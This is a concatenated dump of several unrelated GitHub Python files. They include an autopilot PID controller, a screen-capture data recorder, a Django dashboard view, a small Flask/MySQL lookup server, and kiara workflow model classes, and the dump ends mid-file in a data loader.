0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\tself.a_list=[]\n\t\tself.a_limit = 0.1\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\tself.last_time = time\n\t\t\n\t\t\n\t\t\n\t\t\t\t\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.000001 #prevent divide by 0\n\t\t#Find overall error\n\t\terror = measured - reference\n\t\t\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: error-=360.0\n\t\t\n\t\t#Use linear relationship to determine change in value desired\n\t\ta_reference = error * 0.15 #Desired acceleration toward capture value\n\t\tif a_reference > self.a_limit:\n\t\t\ta_reference = self.a_limit\n\t\telif a_reference < -self.a_limit:\n\t\t\ta_reference = -self.a_limit\n\t\tself.a_list.append(self.prev_error - error)\n\t\tif len(self.a_list) >10:\n\t\t\tself.a_list.pop(0)\n\t\tavg = sum(self.a_list)/ len(self.a_list)\n\t\t\n\t\t\t\t#This is the change in error per second\n\t\t#accel = (self.prev_error - error) / dt\n\t\taccel = (avg) / dt\n\t\tself.Ref = accel\n\t\ta_error = accel - a_reference #error in change of error (acceleration of error)\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (a_error - self.prev_a_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * a_error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = a_error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_a_error = a_error\n\t\t#self.prev_d_error = d_error\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\nclass CAPTURE_EQU_c(AP_c):\n\t#This is used for a capature equation for altitude, and possibly speed hold.\n\tdef __init__(self, multiplier):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.P = 0.0\n\t\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\tdef set_Kp_limit(self, Kp):\n\t\tself.Kp = Kp\n\t\n\t\n\tdef calc(self,measured, reference):\n\t\t#Just calculate it\n\t\t\n\t\t#Find overall error\n\t\terror = measured - reference \n\t\tself.P = error\t\t\t\n\t\t#Proportianal Part\n\t\tself.u = self.Kp * (self.P)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n\t\t\nclass PID4_c(AP_c):\n\t\n\tdef __init__(self, multiplier, global_time, output_ref, output_ref_factor = 1.0):\n\t\t#The overall multipler for the output, and a output refernce, so I of PID controller can be preloaded correctly.\n\t\t#to eliminate ump of output.\n\t\tself.multiplier = multiplier\n\t\tself.output_ref = output_ref #only used during turn_on method so control surfaces don't jump. (Preloads I)\n\t\tself.output_ref_factor = output_ref_factor #used in case output_ref need to by multipled by a factor\n\t\tself.Kp = 1.0 #0.5\n\t\tself.Ti = 1.0\n\t\tself.Td = 1.0\n\t\tself.u_min = -1.0\n\t\tself.u_max = 1.0\n\t\tself.u = 0.0\n\t\tself.last_time = global_time\n\t\tself.prev_error = 0.0\n\t\tself.I = 0.0\n\t\tself.P = 0.0\n\t\tself.D = 0.0\n\t\tself.I_limit = 1.0 / self.Kp\n\t\tself.max_Roc = 100000.0\n\t\tself.min_Roc = 10000.0\n\t\tself.Ref = 0.0\n\t\tself.curve_slope = 10000.0\n\t\tself.max_Roc_limit = 0.0\n\t\t\n\tdef set_gains(self, Kp, Ti, Td):\n\t\tself.Kp = Kp\n\t\tself.Ti = Ti\n\t\tself.Td = Td\n\t\n\tdef set_u_limit(self, umax, umin = None):\n\t\t#if u min not given, then make it -1 * umax\n\t\tif umin == None:\n\t\t\tumin = umax * -1.0\n\t\tself.u_min = umin\n\t\tself.u_max = umax\n\t\t\n\tdef set_I_limit(self, I_limit):\n\t\tself.I_limit = I_limit / self.Kp\n\t\n\tdef set_Roc_curve(self, max, min, slope):\n\t\tself.max_Roc = max\n\t\tself.min_Roc = min\n\t\tself.curve_slope = slope\n\t\t\n\tdef turn_on(self, current_reference):\n\t\t#This is used to set the u and prev_error correctly, so when AP turn on, control wont jump.\n\t\tself.I = (self.output_ref.value * self.output_ref_factor / self.multiplier) / self.Kp\n\t\tself.Ref = current_reference\n\t\tself.prev_error = 0.0\n\t\n\tdef calc(self,measured, reference, time, check180 = False):\n\t\t#check180 will make sure error is within +/- 180 used for heading hold.\n\t\t#Just calculate it\n\t\tdt = time - self.last_time\n\t\tself.last_time = time\n\t\t\n\t\t#Slow down change of reference with curve\n\t\tself.max_Roc_limit += self.curve_slope # * dt * 3\n\t\tif self.max_Roc_limit > self.max_Roc:\n\t\t\tself.max_Roc_limit = self.max_Roc\n\t\tmax = dt * self.max_Roc_limit\n\t\tmin = dt * self.min_Roc \n\t\tcurve = (reference - self.Ref) * self.curve_slope * dt\n\t\t\n\t\t#if curve >0:\n\t#\t\tsign = 1\n\t\t#else: sign = -1\n\t\ta_curve = abs(curve)\n\t\tif a_curve > max:\n\t\t\ta_curve = max\n\t\telse:\n\t\t\t#Curve is limiting max therefore make roc limit equal to curve\n\t\t\tself.max_Roc_limit = a_curve / dt\n\t\t\tif a_curve < min:\n\t\t\t\ta_curve = min\n\t\t\n\t\tif reference > self.Ref:\n\t\t\tself.Ref += a_curve\n\t\t\tif self.Ref > reference:\n\t\t\t\tself.Ref = reference\n\t\telse: #reference < self.Ref\n\t\t\tself.Ref -= a_curve\n\t\t\tif self.Ref < reference:\n\t\t\t\tself.Ref = reference\n\t\t\t\t\n\t\t#Main part of PID controller\n\t\tif dt <= 0.0: dt = 0.000001 #prevent divide by 0\n\t\t#Find overall error\n\t\terror = measured - self.Ref\n\t\t#This makes sure error is within +/-180 only used for heading hold.\n\t\tif check180:\n\t\t\tif error<-180.0: error+=360.0\n\t\t\telif error>180.0: error-=360.0\n\t\t\t\n\t\t#Deriviative Part\n\t\tself.D = self.Td * (error - self.prev_error) / dt\n\t\t#Integral Part\n\t\tself.I = self.I + (1/ self.Ti) * error * dt\n\t\t\n\t\t#Limit I if over I_limit\n\t\tif self.I > self.I_limit:\n\t\t\tself.I = self.I_limit\n\t\telif self.I < -self.I_limit:\n\t\t\tself.I = -self.I_limit\n\t\t\n\t\t\t\n\t\t#Proportianal Part\n\t\tself.P = error\n\t\t\n\t\tself.u = self.Kp * (self.P+self.I+self.D)\n\t\t#Check for max deflection Limit u\n\t\tif self.u > self.u_max:\n\t\t\tself.u = self.u_max\n\t\telif self.u < self.u_min:\n\t\t\tself.u = self.u_min\n\t\t#Calculate previous\n\t\tself.prev_error = error\n\t\t#Multiply by overall multplier converts it to FSX value\n\t\tself.out = self.u * self.multiplier\n","repo_name":"j-omega/RJGlass","sub_path":"autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":26245,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22009406247","text":"import unit\nimport config\nimport numpy as np\nimport cv2\nimport mss\nimport time\nimport os\n\n\ndef images_pre_save_resize(images):\n for i in range(3):\n img = cv2.resize(images[i], (int(config.recorder[\"base_size\"][\"x\"] / 2), int(config.recorder[\"base_size\"][\"y\"] / 2)))\n img = cv2.cvtColor(img, cv2.COLOR_RGBA2GRAY)\n\n if i == 0:\n return_image = img\n else:\n return_image = np.concatenate((return_image, img), axis=1)\n\n return return_image\n\n\ndef array_indexes_to_label_array(indexes):\n return_value = np.zeros(len(config.labels), np.int8)\n\n for index in indexes:\n return_value[index] = 1\n\n return return_value\n\n\nif __name__ == '__main__':\n try:\n xs, ys = np.load(config.save_dataset_content), np.load(config.save_dataset_label)\n xs, ys = xs.tolist(), ys.tolist()\n except:\n xs, ys = [], []\n\n # debug\n time.sleep(5)\n\n with mss.mss() as sct:\n # Part of the screen to capture\n monitor = {\n \"top\": config.recorder[\"start\"][\"y\"],\n \"left\": config.recorder[\"start\"][\"x\"],\n \"width\": config.recorder[\"base_size\"][\"x\"],\n \"height\": config.recorder[\"base_size\"][\"y\"]\n }\n\n while \"Screen capturing\":\n images = []\n\n for i in range(3):\n img = np.array(sct.grab(monitor))\n images.append(img)\n cv2.imshow(\"save % d\" % i, img)\n\n images_to_save = images_pre_save_resize(images)\n cv2.imshow(\"save\", images_to_save)\n\n if cv2.waitKey(25) & 0xFF == ord(\"q\"):\n label = array_indexes_to_label_array([int(i) for i in list(input(\"label %s : \\n\" % str(list(enumerate(config.labels)))))])\n cv2.destroyAllWindows()\n xs.append(images_to_save)\n ys.append(label)\n\n np.save(config.save_dataset_content, xs)\n np.save(config.save_dataset_label, ys)\n break\n","repo_name":"LewisGet/bot_frame","sub_path":"data_clip.py","file_name":"data_clip.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33555074612","text":"\"\"\"Dashboard views of the clubs app.\"\"\"\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom book_club.models import CurrentlyViewing,Post,ClubBookAssignment,UserRating,CurrentlyReading\nfrom django.core.exceptions import ObjectDoesNotExist\n\n@login_required\ndef dashboard(request):\n current_club = CurrentlyViewing.get_currently_viewing(request.user)\n if current_club is None:\n return render(request, 'dashboard.html')\n\n posts = Post.objects.filter(club=current_club)\n\n try:\n clubBooks = ClubBookAssignment.objects.filter(clubs=current_club).prefetch_related('ISBN')\n except ObjectDoesNotExist:\n clubBooks = ''\n\n try:\n userRatedBooks = UserRating.objects.filter(userId=request.user.id).values('ISBN', 'bookRating')\n except ObjectDoesNotExist:\n userRatedBooks = []\n\n try:\n current_book = CurrentlyReading.get_currently_reading(current_club)\n except ObjectDoesNotExist:\n current_book = None\n\n return render(request, 'dashboard.html',\n context={'posts': posts, 'club_books': clubBooks,'userRatedBooks': list(userRatedBooks),\n 'current_book':current_book})\n","repo_name":"Nikitich2033/ai-book-club-manager","sub_path":"book_club/views/dashboard_views.py","file_name":"dashboard_views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6802868529","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport uuid\nfrom typing import TYPE_CHECKING, Any, Dict, List, Mapping, Type, Union\n\nfrom dag_cbor import IPLDKind\nfrom pydantic import Field, PrivateAttr, validator\nfrom rich import box\nfrom rich.console import RenderableType\nfrom rich.panel import Panel\nfrom rich.syntax import Syntax\nfrom rich.table import Table\n\nfrom kiara.interfaces.python_api.models.info import InfoItemGroup, ItemInfo\nfrom kiara.models import KiaraModel\nfrom kiara.models.documentation import (\n AuthorsMetadataModel,\n ContextMetadataModel,\n DocumentationMetadataModel,\n)\nfrom kiara.models.module.pipeline import PipelineConfig, PipelineStep\nfrom kiara.models.module.pipeline.pipeline import Pipeline, PipelineInfo\nfrom kiara.models.module.pipeline.structure import PipelineStructure\nfrom kiara.models.values.value import ValueMap\nfrom kiara.utils import is_jupyter\nfrom kiara.utils.json import orjson_dumps\n\nif TYPE_CHECKING:\n from kiara.context import Kiara\n from kiara.interfaces.python_api.workflow import Workflow\n\n\nclass WorkflowState(KiaraModel):\n @classmethod\n def create_from_workflow(self, workflow: \"Workflow\"):\n\n steps = list(workflow._steps.values())\n inputs = dict(workflow.current_pipeline_inputs)\n info = PipelineInfo.create_from_pipeline(\n kiara=workflow._kiara, pipeline=workflow.pipeline\n )\n info._kiara = workflow._kiara\n\n ws = WorkflowState(steps=steps, inputs=inputs, pipeline_info=info)\n ws._kiara = workflow._kiara\n ws.pipeline_info._kiara = workflow._kiara\n return ws\n\n steps: List[PipelineStep] = Field(\n description=\"The current steps in the workflow.\", default_factory=list\n )\n inputs: Dict[str, uuid.UUID] = Field(\n description=\"The current (pipeline) input values.\", default_factory=dict\n )\n pipeline_info: PipelineInfo = Field(\n description=\"Details about the pipeline and its state.\"\n )\n\n _pipeline: Union[Pipeline, None] = PrivateAttr(default=None)\n _kiara: \"Kiara\" = PrivateAttr(default=None)\n\n def _retrieve_data_to_hash(self) -> IPLDKind:\n return {\n \"steps\": [s.instance_cid for s in self.steps],\n \"inputs\": {k: str(v) for k, v in self.inputs.items()},\n }\n\n def set_inputs(self, **inputs: uuid.UUID):\n\n for k, v in inputs.items():\n if k in self.pipeline_config.structure.pipeline_inputs_schema.keys():\n self.inputs[k] = v\n\n @property\n def pipeline_config(self) -> PipelineConfig:\n\n return self.pipeline_info.pipeline_config\n\n @property\n def pipeline_structure(self) -> PipelineStructure:\n return self.pipeline_info.pipeline_config.structure\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n in_panel = config.get(\"in_panel\", None)\n if in_panel is None:\n if is_jupyter():\n in_panel = True\n else:\n in_panel = False\n table = Table(box=box.SIMPLE, show_header=False, padding=(0, 0, 0, 0))\n table.add_column(\"property\", style=\"i\")\n table.add_column(\"value\")\n table.add_row(\"state id\", self.instance_id)\n\n self.pipeline_info._fill_table(table=table, config=config)\n\n if in_panel:\n return Panel(table)\n else:\n return table\n\n\nclass WorkflowMetadata(KiaraModel):\n _kiara_model_id = \"instance.workflow\"\n\n workflow_id: uuid.UUID = Field(\n description=\"The globaly unique uuid for this workflow.\"\n )\n documentation: DocumentationMetadataModel = Field(\n description=\"A description for this workflow.\",\n default_factory=DocumentationMetadataModel.create,\n )\n authors: AuthorsMetadataModel = Field(\n description=\"The author(s) of this workflow.\",\n default_factory=AuthorsMetadataModel,\n )\n context: ContextMetadataModel = Field(\n description=\"Workflow context details.\", default_factory=ContextMetadataModel\n )\n current_state: Union[str, None] = Field(\n description=\"A reference to the current state of this workflow.\", default=None\n )\n workflow_history: Dict[datetime.datetime, str] = Field(\n description=\"A history of all the states of this workflow.\",\n default_factory=dict,\n )\n\n input_aliases: Dict[str, str] = Field(\n description=\"A set of aliases that can be used to forward inputs to their (unaliased) pipeline inputs.\",\n default_factory=dict,\n )\n output_aliases: Dict[str, str] = Field(\n description=\"A set of aliases to make output field names more user friendly.\",\n default_factory=dict,\n )\n\n is_persisted: bool = Field(\n description=\"Whether this workflow is persisted in it's current state in a kiara store.\",\n default=False,\n )\n\n _kiara: Union[\"Kiara\", None] = PrivateAttr(default=None)\n # _last_update: datetime.datetime = PrivateAttr(default_factory=datetime.datetime.now)\n\n @validator(\"documentation\", pre=True)\n def validate_doc(cls, value):\n if not isinstance(value, DocumentationMetadataModel):\n return DocumentationMetadataModel.create(value)\n else:\n return value\n\n @property\n def last_state_id(self) -> Union[None, str]:\n\n if not self.workflow_history:\n return None\n last_date = max(self.workflow_history.keys())\n workflow_state_id = self.workflow_history[last_date]\n return workflow_state_id\n\n\nclass WorkflowInfo(ItemInfo):\n\n _kiara_model_id = \"info.workflow\"\n\n @classmethod\n def create_from_workflow(cls, workflow: \"Workflow\"):\n\n wf_info = WorkflowInfo.construct(\n type_name=str(workflow.workflow_id),\n workflow_metadata=workflow.workflow_metadata,\n workflow_state_ids=workflow.all_state_ids,\n pipeline_info=workflow.pipeline_info,\n documentation=workflow.workflow_metadata.documentation,\n authors=workflow.workflow_metadata.authors,\n context=workflow.workflow_metadata.context,\n current_input_values=workflow.current_input_values,\n current_output_values=workflow.current_output_values,\n input_aliases=dict(workflow.input_aliases),\n output_aliases=dict(workflow.output_aliases),\n )\n return wf_info\n\n @classmethod\n def category_name(cls) -> str:\n return \"workflow\"\n\n @classmethod\n def base_instance_class(cls) -> Type[\"Workflow\"]:\n from kiara.interfaces.python_api.workflow import Workflow\n\n return Workflow\n\n @classmethod\n def create_from_instance(cls, kiara: \"Kiara\", instance: \"Workflow\", **kwargs):\n\n return cls.create_from_workflow(workflow=instance)\n\n workflow_metadata: WorkflowMetadata = Field(description=\"The workflow details.\")\n workflow_state_ids: List[str] = Field(description=\"All states for this workflow.\")\n pipeline_info: PipelineInfo = Field(\n description=\"The current state of the workflows' pipeline.\"\n )\n current_input_values: ValueMap = Field(\n description=\"The current workflow inputs (after aliasing).\"\n )\n current_output_values: ValueMap = Field(\n description=\"The current workflow outputs (after aliasing).\"\n )\n input_aliases: Dict[str, str] = Field(\n description=\"The (current) input aliases for this workflow.\"\n )\n output_aliases: Dict[str, str] = Field(\n description=\"The (current) output aliases for this workflow.\"\n )\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n in_panel = config.get(\"in_panel\", None)\n if in_panel is None:\n if is_jupyter():\n in_panel = True\n else:\n in_panel = False\n\n include_doc = config.get(\"include_doc\", True)\n include_authors = config.get(\"include_authors\", True)\n include_id = config.get(\"include_id\", True)\n include_context = config.get(\"include_context\", True)\n include_history = config.get(\"include_history\", True)\n include_current_inputs = config.get(\"include_current_inputs\", True)\n include_current_outputs = config.get(\"include_current_outputs\", True)\n include_aliases = config.get(\"include_aliases\", True)\n include_current_state = config.get(\"include_current_state\", True)\n\n table = Table(box=box.SIMPLE, show_header=False, padding=(0, 0, 0, 0))\n table.add_column(\"property\", style=\"i\")\n table.add_column(\"value\")\n\n if include_doc:\n table.add_row(\n \"documentation\",\n Panel(self.documentation.create_renderable(), box=box.SIMPLE),\n )\n if include_authors:\n table.add_row(\"author(s)\", self.authors.create_renderable(**config))\n if include_id:\n table.add_row(\"workflow id\", str(self.workflow_metadata.workflow_id))\n if include_context:\n table.add_row(\"context\", self.context.create_renderable(**config))\n if include_aliases:\n aliases = orjson_dumps(\n {\"inputs\": self.input_aliases, \"outputs\": self.output_aliases}\n )\n table.add_row(\n \"current aliases\", Syntax(aliases, \"json\", background_color=\"default\")\n )\n if include_current_inputs:\n inputs_renderable = self.current_input_values.create_renderable(**config)\n table.add_row(\"current inputs\", inputs_renderable)\n if include_current_outputs:\n outputs_renderable = self.current_output_values.create_renderable(**config)\n table.add_row(\"current outputs\", outputs_renderable)\n if include_history:\n history_table = Table(show_header=False, box=box.SIMPLE)\n history_table.add_column(\"date\", style=\"i\")\n history_table.add_column(\"id\")\n for d, s_id in self.workflow_metadata.workflow_history.items():\n history_table.add_row(str(d), s_id)\n table.add_row(\"snapshot timeline\", history_table)\n\n if include_current_state:\n current_state_id = (\n \"-- n/a --\"\n if not self.workflow_metadata.current_state\n else self.workflow_metadata.current_state\n )\n table.add_row(\"current state id\", current_state_id)\n table.add_row(\n \"current state details\", self.pipeline_info.create_renderable(**config)\n )\n\n if in_panel:\n return Panel(table)\n else:\n return table\n\n\nclass WorkflowGroupInfo(InfoItemGroup):\n\n _kiara_model_id = \"info.workflows\"\n\n @classmethod\n def base_info_class(cls) -> Type[ItemInfo]:\n return WorkflowInfo\n\n @classmethod\n def create_from_workflows(\n cls,\n *items: \"Workflow\",\n group_title: Union[str, None] = None,\n alias_map: Union[None, Mapping[str, uuid.UUID]] = None\n ) -> \"WorkflowGroupInfo\":\n\n workflow_infos = {\n str(w.workflow_id): WorkflowInfo.create_from_workflow(workflow=w)\n for w in items\n }\n if alias_map is None:\n alias_map = {}\n workflow_group_info = cls.construct(\n group_title=group_title, item_infos=workflow_infos, aliases=alias_map\n )\n return workflow_group_info\n\n item_infos: Mapping[str, WorkflowInfo] = Field(\n description=\"The workflow infos objects for each workflow.\"\n )\n aliases: Mapping[str, uuid.UUID] = Field(\n description=\"The available aliases.\", default_factory=dict\n )\n\n def create_renderable(self, **config: Any) -> RenderableType:\n\n table = Table(box=box.SIMPLE, show_header=True)\n table.add_column(\"alias(es)\", style=\"i\")\n table.add_column(\"workflow_id\")\n table.add_column(\"# steps\")\n table.add_column(\"# stages\")\n table.add_column(\"# states\")\n table.add_column(\"description\")\n\n for workflow_id, wf in self.item_infos.items():\n\n aliases = [k for k, v in self.aliases.items() if str(v) == workflow_id]\n steps = len(wf.pipeline_info.pipeline_config.structure.steps)\n stages = len(wf.pipeline_info.pipeline_config.structure.processing_stages)\n states = len(wf.workflow_state_ids)\n\n if not aliases:\n alias_str = \"\"\n else:\n alias_str = \", \".join(aliases)\n table.add_row(\n alias_str,\n workflow_id,\n str(steps),\n str(stages),\n str(states),\n wf.documentation.description,\n )\n\n return table\n","repo_name":"DHARPA-Project/kiara","sub_path":"src/kiara/models/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":12699,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"19556750471","text":"from flask import Flask, jsonify, request\nimport re\nimport datetime\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.dialects.mysql import LONGTEXT\nfrom sqlalchemy.orm import relationship, backref\nfrom flask_cors import *\nimport pymysql\nimport json\n\ndef _connect():\n '''连接MySQL数据库'''\n try:\n db = pymysql.connect(\n host='localhost',\n port=3306,\n user='gpc',\n passwd='gpc',\n db='c3server_v3',\n charset='utf8'\n )\n return db\n except Exception:\n raise Exception(\"数据库连接失败\")\n\nserver=Flask(__name__)\nCORS(server, supports_credentials=True)\nserver.config['DEBUG'] = False\n\ndef table_exists(table_name): #这个函数用来判断表是否存在\n db = _connect()\n cursor = db.cursor()\n sql = \"show tables;\"\n cursor.execute(sql)\n tables = [cursor.fetchall()]\n table_list = re.findall('(\\'.*?\\')',str(tables))\n table_list = [re.sub(\"'\",'',each) for each in table_list]\n if table_name in table_list:\n db.close()\n return 1 #存在返回1\n else:\n db.close()\n return 0 #不存在返回0\n\n@server.route('/api/requests', methods=['POST'])\ndef requests():\n start = datetime.datetime.now()\n get_data = json.loads(request.get_data(as_text=True))\n tablename=get_data['table_name']\n H=get_data['H']\n print(H)\n\n if table_exists(tablename) == 0:\n print(tablename+' not exists')\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"none\")\n else:\n db = _connect()\n cur = db.cursor()\n sqlQuery = \"SELECT * FROM \"+tablename\n try:\n cur.execute(sqlQuery)\n results = cur.fetchall()\n for data in results:\n if int(H) == int(data[0]):\n db.close()\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"match\")\n end = datetime.datetime.now()\n print(\"using time:\\t\",end-start)\n return jsonify(result=\"none\") \n except pymysql.Error as e:\n print(\"数据查询失败:\" + str(e))\n \nif __name__ == '__main__':\n server.run()","repo_name":"nsndhx/cryptograghy_lab","sub_path":"lab4/code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15308785786","text":"#!/usr/bin/env python3\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(name='rtsp_ws_stream',\n version='0.1',\n description='Python library to provide a rtsp from camera via websocket',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='Schwimo',\n author_email='Schwimo@github.com',\n url='www.schwuster.de',\n packages=setuptools.find_packages('include'),\n package_dir={'': 'include'},\n classifiers=[\n 'Programming Language :: Python3',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: Ubuntu',\n ],\n install_requires=[\n 'numpy',\n 'autobahn',\n 'twisted'\n ]\n )\n","repo_name":"Schwimo/cam_rtsp_detect","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38512518649","text":"from pathlib import Path\n\nimport dash_bootstrap_components as dbc\nfrom dash import callback\nfrom dash.dependencies import MATCH, Input, Output, State\nfrom dash.exceptions import PreventUpdate\n\nfrom .model import predict\n\n\n@callback(\n Output(\"run-card\", \"children\"),\n Input(\"add-button\", \"n_clicks\"),\n State(\"run-card\", \"children\"),\n)\ndef add_row(n_clicks: int, children: list) -> list:\n \"\"\"Adds a row to the card with the model results when \"Add Row\" button is clicked.\n\n Each object in the row is provided with a dictionary id so that they can be used\n correctly with pattern-matching callbacks.\n\n Args:\n n_clicks (int): Increments on a button click. The trigger for this callback.\n children (list): The children of the card. Contains dbc.Row or dbc.Form.\n\n Returns:\n list: The updated children. Equivalent to the input children plus a Form/Row\n \"\"\"\n if n_clicks is None:\n n_clicks = 0\n\n form = dbc.Form(\n dbc.Row(\n [\n dbc.Col(\n dbc.Input(type=\"text\", id=dict(type=\"lk\", index=n_clicks)),\n ),\n dbc.Col(\n dbc.Input(type=\"text\", id=dict(type=\"bb\", index=n_clicks)),\n ),\n dbc.Col(\n [\n dbc.Select(\n id=dict(type=\"model-dropdown\", index=n_clicks),\n value=\"amine2aldehyde3\",\n options=[\n {\"label\": model.stem, \"value\": model.stem}\n for model in Path(\"models\").glob(\"*\")\n ],\n ),\n ]\n ),\n dbc.Col(\n dbc.Button(\n \"Run Model \\U0001F680\",\n id=dict(type=\"run-button\", index=n_clicks),\n color=\"primary\",\n ),\n class_name=\"d-grid gap-2\",\n ),\n dbc.Col(dbc.Spinner(dbc.Label(id=dict(type=\"result\", index=n_clicks)))),\n ],\n align=\"center\",\n )\n )\n return children + [form]\n\n\n@callback(\n Output({\"type\": \"result\", \"index\": MATCH}, \"children\"),\n Input({\"type\": \"run-button\", \"index\": MATCH}, \"n_clicks\"),\n State({\"type\": \"model-dropdown\", \"index\": MATCH}, \"value\"),\n State({\"type\": \"bb\", \"index\": MATCH}, \"value\"),\n State({\"type\": \"lk\", \"index\": MATCH}, \"value\"),\n)\ndef run_model(n_clicks: int, model_name: str, bb: str, lk: str) -> dbc.Label:\n \"\"\"Runs the model when the \"Run Model\" button is clicked and displays the result.\n\n Since there are potentially multiple \"Run Model\" buttons, we need to know which one\n was clicked so we can fill in the corresponding result box. This is done using\n Pattern-Matching Callbacks (see: https://dash.plotly.com/pattern-matching-callbacks)\n\n Args:\n n_clicks (int): Increments on a button click. The trigger for this callback.\n model_name (str): The name of the desired model to run\n bb (str): The Building Block SMILES string.\n lk (str): The Linker SMILES string.\n\n Raises:\n PreventUpdate: Prevents the callback from being run automatically on page load.\n\n Returns:\n dbc.Label: A label with the result of the model. Possible Answers:\n - INVALID INPUT\n - COLLAPSED\n - SHAPE PERSISTENT\n - MODEL ERROR\n \"\"\"\n if n_clicks is None or bb is None or lk is None:\n raise PreventUpdate\n\n try:\n result = predict(model_name, bb, lk)\n except ValueError:\n return dbc.Label(\"INVALID INPUT\", color=\"warning\")\n\n if result == 1:\n return dbc.Label(\"COLLAPSED\", color=\"danger\")\n if result == 0:\n return dbc.Label(\"SHAPE PERSISTENT\", color=\"success\")\n return dbc.Label(\"MODEL ERROR\", color=\"warning\")\n","repo_name":"ImperialCollegeLondon/SupraShare","sub_path":"website/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"4970233544","text":"import functools\nfrom collections import OrderedDict\nfrom typing import Callable, List, Optional, Sequence, Tuple\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nfrom esm.data import BatchConverter\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader, Dataset, Sampler\n\n\nclass AlphabetDataLoader:\n \"\"\"Class that carries tokenizer information\"\"\"\n\n def __init__(\n self,\n prepend_bos: bool,\n append_eos: bool,\n mask_idx: int,\n pad_idx: int,\n standard_toks: List[str],\n model_dir: str,\n lambda_toks_to_ids: Callable,\n lambda_tokenizer: Callable,\n ) -> None:\n self.prepend_bos = prepend_bos\n self.append_eos = append_eos\n self.mask_idx = mask_idx\n self.padding_idx = pad_idx\n self.standard_toks = standard_toks\n self.model_dir = model_dir\n self.lambda_toks_to_ids = lambda_toks_to_ids\n self.lambda_tokenizer = lambda_tokenizer\n\n def tok_to_idx(self, x):\n return self.lambda_toks_to_ids(x)\n\n def 